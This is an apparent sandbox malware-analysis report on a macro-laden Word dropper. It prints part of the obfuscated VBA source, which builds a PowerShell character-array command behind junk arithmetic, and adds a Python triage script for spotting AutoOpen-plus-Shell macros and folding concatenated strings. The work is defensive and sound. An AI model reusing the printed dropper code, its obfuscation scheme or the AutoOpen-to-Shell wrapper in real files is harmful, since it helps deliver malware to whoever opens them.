Verdict: MALICIOUS
Risk Score: 242
Malware Insights
MITRE ATT&CK
- T1059 Command and Scripting Interpreter
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1204.002 User Execution: Malicious File
The sample is a malicious Office document containing a VBA macro. The macro uses the AutoOpen entry point, so it runs as soon as the document is opened, and it calls Shell(), which launches an external process: together these are a direct indicator of arbitrary code execution. ClamAV independently classifies the file as a dropper (Doc.Dropper.Agent-6595066-0). The recovered source is heavily obfuscated: each function opens with On Error Resume Next so that the interleaved junk arithmetic (Atn/Round/CInt over uninitialised variables, including divisions by CInt of an empty variable, i.e. by zero) fails silently, and the real work is a long chain of short string fragments concatenated into one command string. The visible fragment starts with "HELL" followed by "([ChaR[]]" and a list of decimal numbers, which is consistent with a PowerShell command assembled from a character array; the numbers are not plain ASCII, so the final command is not readable from the preview alone. The obfuscation and the Shell() call together indicate that the macro is designed to download and execute a secondary payload.
Heuristics (7)
- ClamAV detection (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6595066-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- AutoOpen macro (high, OLE_VBA_AUTOOPEN): AutoOpen macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. Read this one alongside the Extracted artifacts section: a VBA project was recovered from this sample, so the finding adds no independent evidence beyond the AutoOpen marker already reported above.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the DrawingML XML namespace identifier found in ordinary Office files; it is never contacted at runtime and is not an indicator of compromise.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size | SHA-256 |
|---|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10656 bytes | bce3d2b7bc0913af6165670f5c3a5a73f28e8324cb4dfa63e3520a3e8830ada3 |

Preview (first 1,000 lines of the extracted script). The dump collapsed the source onto a single line; it is shown here with the VBA statement breaks and ` _` line continuations restored. The two `Attribute VB_Name` headers are two modules written into one file: the document module (VB_Base = "1Normal.ThisDocument") and the standard module JIdzThF that holds the string-building functions.

```vb
Attribute VB_Name = "wWObmmomCMP"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "JIdzThF"
Function iYLOHTFO()
On Error Resume Next
HUADn _
= 42106 + Atn(4954) / 41930 / _
Round(28119) / 25610 / CInt(fvADsj)
kFKPRz = ChrB(75461 + _
Sin(swZuMW * CLng(LiRlUS + 57160) _
+ 16034 _
+ qmoBf))
hScanoR = "HELL " + " " + " " + " " + " " + " " + " " + Chr(40) + "[Ch" + "aR[]]" + " " + Chr(40) + "97,49" + " ,47 ,"
NtDdkw _
= 23159 + Atn(85099) / 7122 / _
Round(6666) / 31788 / CInt(dEwTAZ)
jVlGMJ = ChrB(13409 + _
Sin(mZiJlP * CLng(lfqjl + 81591) _
+ 98865 _
+ NiDaAE))
zQNRbwiuzt = "63,120 " + ", 43, 3" + "2, 50 " + ",104, " + "42, 39, 4" + "7, 32 ," + "38 , 49," + "101 , 11 " + ",32, " + "49, 107 " + ",18, 32,"
WlPJvH _
= 52683 + Atn(74777) / 83157 / _
Round(37310) / 57373 / CInt(ZSYuf)
NSRdQn = ChrB(3246 + _
Sin(jYYJjG * CLng(LDsubT + 14606) _
+ 18846 _
+ zQHqaT))
zMzljr = " 39,6," + "41, 4" + "4 , 32" + " ,43," + " 49, 12" + "6, 97 , " + "6, 54 ,4" + "4 , 120,9" + "8,45, 49 "
oYzmlJ _
= 86265 + Atn(40795) / 52537 / _
Round(15533) / 21805 / CInt(DOikX)
NPjzD = ChrB(18422 + _
Sin(JYdAj * CLng(KPjjk + 72022) _
+ 37223 _
+ BKXST))
OXdUCTuC = ",49, 53 " + ",127," + "106, 1" + "06,32 ," + " 55 " + ", 44,38," + "38, 42"
iGdRj _
= 69143 + Atn(66751) / 24274 / _
Round(8510) / 16547 / CInt(UojclO)
vwAJT = ChrB(58900 + _
Sin(wEALFI * CLng(kBXCuM + 39386) _
+ 92915 _
+ zKbvPz))
oZuAqs = ", 43" + ", 54," + "48,41 ,49" + " , 44,43" + " , 34 ,10" + "7 ,38, 4" + "2, 40, " + "106 ," + "36 , 106" + ", 5,45,4" + "9,49, "
fQvCXW _
= 13369 + Atn(49112) / 75901 / _
Round(98742) / 38758 / CInt(fiAzAH)
mJZqCA = ChrB(97562 + _
Sin(Dwsjh * CLng(RVvJF + 17831) _
+ 25349 _
+ zOvsnQ))
mrvBFiOq = "53 ," + "127,106" + ",106, 38," + " 41, 48" + " , 39,51 " + ",42 ,4"
zLaofK _
= 55554 + Atn(9969) / 49318 / _
Round(86732) / 5361 / CInt(CDavQ)
fOMFpu = ChrB(96114 + _
Sin(rMKvK * CLng(iZGnR + 89745) _
+ 4035 _
+ oQVQCk))
zlWCqnHwLAw = "1,51 , " + "42 , " + "44 ,49 , " + "36,41" + " ,44" + ",36 , 1"
qWTfF _
= 13872 + Atn(4634) / 64214 / _
Round(84592) / 41385 / CInt(qHSQui)
pqdzni = ChrB(41649 + _
Sin(pZwjZs * CLng(NAprQ + 8711) _
+ 11275 _
+ sORlEu))
YYRwurk = "07, " + "44,49 " + ",106 ," + "60, 1 , " + "15 ,115 " + ",13, "
iYLOHTFO = hScanoR + zQNRbwiuzt + zMzljr + OXdUCTuC + oZuAqs + mrvBFiOq + zlWCqnHwLAw + YYRwurk
XVrhM _
= 87032 + Atn(63946) / 87491 / _
Round(67397) / 79888 / CInt(USdkI)
ocuRbC = ChrB(26903 + _
Sin(jLkjVt * CLng(qRBar + 84853) _
+ 59845 _
+ jHGBG))
End Function
Function fqXccOXE()
On Error Resume Next
nCHFVw _
= 53325 + Atn(695) / 11752 / _
Round(92876) / 36743 / CInt(CdiwKN)
riBbJR = ChrB(7584 + _
Sin(IOKVB * CLng(uwIdd + 615) _
+ 92505 _
+ pKFHNp))
OCCsKClKYZp = "106 ," + "5,45 ,49" + ", 49 " + ",53 ," + "127,1" + "06 ,106" + " ,47, 3" + "6, 53 " + ", 36" + ",43 ,44," + " 54, 40," + "107 ,42"
mjztF _
= 28825 + Atn(10399) / 74401 / _
Round(52353) / 95881 / CInt(RnTmva)
WIjZT = ChrB(61964 + _
Sin(ACoqW * CLng(DOGVi + 25687) _
+ 54200 _
+ spJhfq))
hFwtIpKYF = " ,55" + " ,34 ,1" + "06 , 48 " + ", 53," + "41, 42 " + ",36, 3" + "3,54" + " ,10" + "6, 8 ," + "10 , 28,6" + "3,55"
IVDPip _
= 82786 + Atn(64035) / 40459 / _
Round(24346) / 31402 / CInt(jEMQw)
vkDjw = ChrB(14499 + _
Sin(wWiSXs * CLng(qisjka + 84783) _
+ 24005 _
+ hlIOw))
KsYGwz = ",106,5,4" + "5 , 49 ," + "49,5" + "3, 1" + "27, 106 " + ", 106 ,4" + "9 ,36" + ", 49 ,3" + "6 ,43 ,46" + " , 36 , "
qfYMcj _
= 11900 + Atn(60548) / 52505 / _
Round(45734) / 92653 / CInt(fTMOzU)
aCMjfV = ChrB(24619 + _
Sin(XVuptl * CLng(fzuKQ + 8520) _
+ 68930 _
+ QIotMt))
VWZmr = "107 " + ", 44 ," + "49,106 , " + "0, 2" + "1 ,117,11" + "4,113 " + ",14, " + "14,106,5," + " 45 ,49" + " ,49 ," + " 53 ,127" + " ,106, "
SoolV _
= 87578 + Atn(5 ... (truncated)
```
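The two checks a triage script needs for a document like this, as an added example that is mine and not the analyzer's code or anything shipped with the report: the co-occurrence test behind the OLE_VBA_PCODE_AUTOEXEC_EXEC-style rule (an auto-execution entry point together with an execution or download token), here applied to recovered source rather than to p-code, and folding of literal-only concatenation chains (string fragments plus Chr()/ChrW() calls) so the analyst sees the assembled string rather than the fragments. The hScanoR line in the constructed sample is the one from the preview above; the AutoOpen wrapper that hands the built string to Shell, and the token lists, are my assumptions modelled on the report's OLE_VBA_AUTOOPEN and OLE_VBA_SHELL findings, since that part of the source is not in the preview.

```python
import re

# Constructed sample (not the full extracted macro). The hScanoR line is copied
# from the report's macros.bas preview; the AutoOpen/Shell wrapper is an
# assumption modelled on the report's OLE_VBA_AUTOOPEN and OLE_VBA_SHELL hits.
SAMPLE_VBA = '''Attribute VB_Name = "JIdzThF"
Function iYLOHTFO()
On Error Resume Next
HUADn _
= 42106 + Atn(4954) / 41930 / _
Round(28119) / 25610 / CInt(fvADsj)
hScanoR = "HELL " + " " + " " + " " + " " + " " + " " + Chr(40) + "[Ch" + "aR[]]" + " " + Chr(40) + "97,49" + " ,47 ,"
iYLOHTFO = hScanoR
End Function
Sub AutoOpen()
Shell iYLOHTFO(), vbHide
End Sub
'''

# Token lists are my own choice for this example, not the analyzer's rule set.
AUTOEXEC_TOKENS = ("AutoOpen", "Auto_Open", "AutoExec", "AutoClose",
                   "Document_Open", "Document_Close", "Workbook_Open")
EXEC_TOKENS = ("Shell", "WScript.Shell", "ShellExecute", "CreateObject",
               "URLDownloadToFile", "MSXML2.XMLHTTP", "ADODB.Stream",
               "powershell", "cmd.exe")


def join_continuations(src):
    """Merge VBA line continuations (' _' at end of line) so each statement is one physical line."""
    return re.sub(r"[ \t]+_[ \t]*\r?\n[ \t]*", " ", src)


# One literal piece: a VBA string literal ("" escapes a quote) or Chr(n)/ChrW(n).
_PIECE = r'(?:"(?:[^"]|"")*"|ChrW?\(\s*\d+\s*\))'
_PIECE_RE = re.compile(_PIECE, re.IGNORECASE)
# A chain of two or more pieces joined by + or &; variables break the chain.
_CHAIN_RE = re.compile(_PIECE + r"(?:\s*[+&]\s*" + _PIECE + r")+", re.IGNORECASE)


def _eval_piece(piece):
    if piece.startswith('"'):
        return piece[1:-1].replace('""', '"')
    return chr(int(re.search(r"\d+", piece).group()))


def fold_strings(line):
    """Collapse literal-only concatenation chains into a single VBA string literal."""
    def repl(m):
        text = "".join(_eval_piece(p) for p in _PIECE_RE.findall(m.group(0)))
        return '"' + text.replace('"', '""') + '"'
    return _CHAIN_RE.sub(repl, line)


def scan_tokens(src):
    """Return (auto-exec entry points, execution/download tokens) present in the source.

    VBA is case-insensitive. Matches inside string literals count too, which is
    what a sandbox token heuristic does; a leading '.' is excluded so 'Shell'
    does not double-count 'WScript.Shell'."""
    flat = join_continuations(src)

    def hits(tokens):
        return sorted(t for t in tokens
                      if re.search(r"(?<![\w.])" + re.escape(t) + r"(?!\w)", flat, re.IGNORECASE))
    return hits(AUTOEXEC_TOKENS), hits(EXEC_TOKENS)


def triage(src):
    """Co-occurrence rule (auto-exec marker together with an execution token),
    plus every line on which concatenation folding recovered a string."""
    auto, execs = scan_tokens(src)
    decoded = []
    for line in join_continuations(src).splitlines():
        folded = fold_strings(line)
        if folded != line:
            decoded.append(folded.strip())
    return {"autoexec": auto, "exec": execs,
            "suspicious": bool(auto) and bool(execs),
            "decoded_strings": decoded}


if __name__ == "__main__":
    import json
    print(json.dumps(triage(SAMPLE_VBA), indent=2))
```

On the constructed sample this reports AutoOpen together with Shell and recovers `hScanoR = "HELL       ([ChaR[]] (97,49 ,47 ,"`. Folding only handles chains built entirely from literals and Chr() calls; the decimal list that follows "[ChaR[]]" in the real macro is not readable ASCII (97, 49, 47, 63, 120 would be `a1/?x`), so the preview alone does not yield the final command, and a dynamic run or the untruncated source is needed for that step.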